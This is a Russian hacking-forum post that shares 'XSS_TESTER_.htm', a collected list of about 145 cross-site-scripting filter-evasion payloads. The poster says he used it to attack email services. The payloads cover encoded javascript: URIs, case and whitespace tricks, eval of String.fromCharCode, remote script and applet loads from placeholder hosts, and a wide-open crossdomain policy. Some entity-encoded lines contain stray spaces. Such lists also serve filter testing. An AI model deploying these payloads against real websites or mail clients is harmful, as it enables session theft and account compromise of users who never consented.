Основан 26 Июля 2013 года
freehacks.ru fhacks.me fhacks.pw fhacksnplmzxaaoo.onion
HashFlare
Показано с 1 по 1 из 1

Тема: XSS_TESTER_.htm

  1. #1
    TopicStarter
    Lord
    of the two universes
    Аватар для •Lexx•

    Статус
    Offline
    Регистрация
    24.10.2013
    Сообщений
    296
    Репутация
    167 + / -
    Другое

    XSS_TESTER_.htm

    В хозяйство.....
    собирал для себя, если есть еще, кидайте суда, для комплекта
    В свое время почты бомил на Ура! =\
    Сейчас, более мение актуален.

    \\============================================\\
    <h1>cXssTester</h1><br>
    <h2>See source</h2><br>
    <h3>XSS Testing (look for bad filtering)</h3>
    <script>alert(1)</script>
    <body onLoad=alert(2)>
    <body OnlOaD=alert(3)>
    <meta http-equiv=Refresh content=0;url=javascript:alert(4)>
    <image src=i.jpg onload=alert(5)>
    <image src=i.jpg OnlOaD=alert(6)>
    <image src=javascript:alert(7)>
    <image src="" onerror=alert(8)>
    <image src='' onerror=alert(9)>
    <img src="" onerror=alert(10)>
    <img src='' onerror=alert(11)>
    <embed src=javascript:alert(12);this.avi>
    <embed src=javascript:alert(13);this.wav>
    <img src=i.jpg onload=alert(14)>
    <img src=i.jpg OnlOaD=alert(15)>
    <img src=javascript:alert(16)>
    <hr style=background:url(javascript:alert(17))>
    <span style=background:url(javascript:alert(18))></span>
    <hr style=top:expression(alert(19))>
    <span style=top:expression(alert(20))></span>
    <span sss="alert(21);this.sss=null" style=top:expression(eval(this.sss));></span>
    <span sss='alert(22);this.sss=null' style=top:expression(eval(this.sss));></span>
    <span sss=alert(23);this.sss=null style=top:expression(eval(this.sss));></span>
    <hr sss="alert(24);this.sss=null" style=top:expression(eval(this.sss));>
    <hr sss='alert(25);this.sss=null' style=top:expression(eval(this.sss));>
    <hr sss=alert(26);this.sss=null style=top:expression(eval(this.sss));>
    <style type="text/css">@import url(javascript:alert(27));</style>
    <object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(28)></object>
    <iframe src=javascript:alert(29)>
    <a href=javascript:alert(30)>click me</a>
    <meta http-equiv=Refresh content=0;url=vbscript:alert(31)>
    <image src=vbscript:alert(32)>
    <embed src=vbscript:alert(33);this.avi>
    <embed src=vbscript:alert(34);this.wav>
    <img src=vbscript:alert(35)>
    <hr style=background:url(vbscript:alert(36))>
    <span style=background:url(vbscript:alert(37))></span>
    <style type="text/css">@import url(vbscript:alert(38));</style>
    <object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=vbscript:alert(39)></object>
    <iframe src=vbscript:alert(40)>
    <a href=vbscript:alert(41)>click me</a>
    <meta http-equiv=Refresh content=0;url=&#106&#97&#118&#97&#115&#99&#114&#10 5&#112&#116:alert(42)>
    <image src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#11 6:alert(43)>
    <embed src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#11 6:alert(44);this.avi>
    <embed src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#11 6:alert(45);this.wav>
    <img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#11 6:alert(46)>
    <hr style=background:url(&#106&#97&#118&#97&#115&#99&# 114&#105&#112&#116:alert(47))>
    <span style=background:url(&#106&#97&#118&#97&#115&#99&# 114&#105&#112&#116:alert(48))></span>
    <style type="text/css">@import url(&#106&#97&#118&#97&#115&#99&#114&#105&#112&#11 6:alert(49));</style>
    <object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=&#106&#97&#118&#97&#115&#99&#114&#105&#112&# 116:alert(50)></object>
    <iframe src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#11 6:alert(51)>
    <a href=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#1 16:alert(52)>click me</a>
    <meta http-equiv=Refresh content=0;url=javascript&#9:alert(53)>
    <image src=javascript&#9:alert(54)>
    <embed src=javascript&#9:alert(55);this.avi>
    <embed src=javascript&#9:alert(56);this.wav>
    <img src=javascript&#9:alert(57)>
    <hr style=background:url(javascript&#9:alert(58))>
    <span style=background:url(javascript&#9:alert(59))></span>
    <style type="text/css">@import url(javascript&#9:alert(60));</style>
    <object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript&#9:alert(61)></object>
    <iframe src=javascript&#9:alert(62)>
    <a href=javascript&#9:alert(63)>click me</a>
    <meta http-equiv=Refresh content=0;url=javascript&#10:alert(64)>
    <image src=javascript&#10:alert(65)>
    <embed src=javascript&#10:alert(66);this.avi>
    <embed src=javascript&#10:alert(67);this.wav>
    <img src=javascript&#10:alert(68)>
    <hr style=background:url(javascript&#10:alert(69))>
    <span style=background:url(javascript&#10:alert(70))></span>
    <style type="text/css">@import url(javascript&#10:alert(71));</style>
    <object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript&#10:alert(72)></object>
    <iframe src=javascript&#10:alert(73)>
    <a href=javascript&#10:alert(74)>click me</a>
    <meta http-equiv=Refresh content=0;url=javascript&#13:alert(75)>
    <image src=javascript&#13:alert(76)>
    <embed src=javascript&#13:alert(77);this.avi>
    <embed src=javascript&#13:alert(78);this.wav>
    <img src=javascript&#13:alert(79)>
    <hr style=background:url(javascript&#13:alert(80))>
    <span style=background:url(javascript&#13:alert(81))></span>
    <style type="text/css">@import url(javascript&#13:alert(82));</style>
    <object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript&#13:alert(83)></object>
    <iframe src=javascript&#13:alert(84)>
    <a href=javascript&#13:alert(85)>click me</a>
    <meta http-equiv=Refresh content=0;url=javascript :alert(86)>
    <image src=javascript :alert(87)>
    <embed src=javascript :alert(88);this.avi>
    <embed src=javascript :alert(89);this.wav>
    <img src=javascript :alert(90)>
    <hr style=background:url(javascript :alert(91))>
    <span style=background:url(javascript :alert(92))></span>
    <style type="text/css">@import url(javascript :alert(93));</style>
    <object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript :alert(94)></object>
    <iframe src=javascript :alert(95)>
    <a href=javascript :alert(96)>click me</a>
    <meta http-equiv=Refresh content=0;url=javascript
    :alert(97)>
    <image src=javascript
    :alert(98)>
    <embed src=javascript
    :alert(99);this.avi>
    <embed src=javascript
    :alert(100);this.wav>
    <img src=javascript
    :alert(101))>
    <hr style=background:url(javascript
    :alert(102))>
    <span style=background:url(javascript
    :alert(103))></span>
    <style type="text/css">@import url(javascript
    :alert(104));</style>
    <object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript
    :alert(105)></object>
    <iframe src=javascript
    <a href=javascript
    :alert(106)>click me</a>
    <image src="" OnERror=alert(107)>
    <image src='' OnERror=alert(108)>
    <img src="" OnERror=alert(109)>
    <img src='' OnERror=alert(110)>
    <image src=""onerror=alert(111)>
    <image src=''onerror=alert(112)>
    <img src=""onerror=alert(113)>
    <img src=''onerror=alert(114)>
    <image src=""OnErRor=alert(115)>
    <image src=''OnErRor=alert(116)>
    <img src=""OnErRor=alert(117)>
    <img src=''OnErRor=alert(118)>
    <image src="a"onError=alert(119)>
    <image src='a'onError=alert(120)>
    <img src="a"onError=alert(121)>
    <img src='a'onError=alert(122)>
    <image src="a"OnErRor=alert(123)>
    <image src='a'OnERror=alert(124)>
    <img src="a"OnErRor=alert(125)>
    <img src='a'OnErRor=alert(126)>
    <image src="a" OnErRor=alert(127)>
    <image src='a' OnErRor=alert(128)>
    <img src="a" OnErRor=alert(129)>
    <img src='a' OnErRor=alert(130)>
    <image src="a"onerror=alert(131)>
    <image src='a'onerror=alert(132)>
    <img src="a"onerror=alert(133)>
    <img src='a'onerror=alert(134)>
    <image src="a"OnErRor=alert(135)>
    <image src='a'OnErRor=alert(136)>
    <img src="a"OnErRor=alert(137)>
    <img src='a'OnErRor=alert(138)>
    <img src=""<iframe src="javascript:alert('139')">>
    <img src="qwe.gif" style="background:url(
    javasc
    ript:
    al
    ert('140'))">
    <img src=""<iframe src="javascript:alert('141')">
    <img src=. /onErrOr="alert(142)">
    <img src=. /onErrOr ='alert(143)'>
    <img src=. /onErrOr
    =`alert(144)`>
    <img src=. /style="background:url(javascript:alert(145))">
    <img src="&#x6a" dynsrc="&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&# x70&#x74&#x3a&#x61&#x6c&#x65&#x72&#x74&#x28&#x27&# x61&#x61&#x61&#x61&#x27&#x29&#x3b">
    <img src="&#x006a" lowsrc="&#x006a&#x0061&#x0076&#x0061&#x0073&#x0063 &#x0072&#x69&#x0070&#x0074&#x003a&#x0061&#x006c&#x 0065&#x0072&#x0074&#x0028&#x0027&#x0061&#x0061&#x0 061&#x0061&#x0027&#x0029&#x003b">
    <iframe src="&#00000106&#0000097&#00000118&#0000097&#00000 115&#0000099&#00000114&#00000105&#00000112&#000001 16&#0000058&#0000097&#00000108&#00000101&#00000114 &#00000116&#0000040&#0000039&#0000097&#0000097&#00 00097&#0000039&#0000041&#0000059"></iframe>
    <img src="&#00000106&#0000097&#00000118&#0000097&#00000 115&#0000099&#00000114&#00000105&#00000112&#000001 16&#0000058&#0000097&#00000108&#00000101&#00000114 &#00000116&#0000040&#0000039&#0000097&#0000097&#00 00097&#0000039&#0000041&#0000059">
    <image src="&#00000106&#0000097&#00000118&#0000097&#00000 115&#0000099&#00000114&#00000105&#00000112&#000001 16&#0000058&#0000097&#00000108&#00000101&#00000114 &#00000116&#0000040&#0000039&#0000097&#0000097&#00 00097&#0000039&#0000041&#0000059">
    <img src="
    &#x006a
    &#x0061
    &#x0076
    &#x0061
    &#x0073
    &#x0063
    &#x0072
    &#x0069
    &#x0070
    &#x0074
    &#x003a
    &#x0061
    &#x006c
    &#x0065
    &#x0072
    &#x0074
    &#x0028
    &#x0027
    &#x0061
    &#x0061
    &#x0061
    &#x0061
    &#x0027
    &#x0029
    &#x003b">
    <image src="=>" onerror ="eval(String.fromCharCode(97,108,101,114,116,40,3 9,101,101,101,101,101,101,101,101,101,101,101,33,3 9,41))">
    <script/src=http://site.net/s.js></script>
    <applet code="http://site.net/s.class"></applet><br>


    <h3>CDDAF Testing (check referer and XML filtering)</h3><br>
    link1 - [Только зарегистрированные могут видеть это. ] <br>
    link2 - <a href=http://www.google.com>www.google.com</a><br>
    img - <img src="http://www.google.co.in/images/hp0.gif"><br>
    iframe - <iframe src=http://site.com/s.gif></iframe><br>
    embed - <embed src="http://site.com/as.swf"></embed><br>
    applet - <applet code="http://site.com/s.class"></applet><br>
    <h5>XML Start</h5><br>
    <?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*" to-ports="*" secure="false" /></cross-domain-policy>
    <h5>XML End<h5><br>
    <h3>EOM</h3>

    \\================================================ ======\\

    [Только зарегистрированные могут видеть это. ]

  2. 2 пользователя(ей) сказали cпасибо:
    adminDevelop

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Информация на сайте предоставлена исключительно в ознакомительных целях, использование знаний в противозаконных целях преследуется по закону! Администрация не несет ответственности за ваши деяния.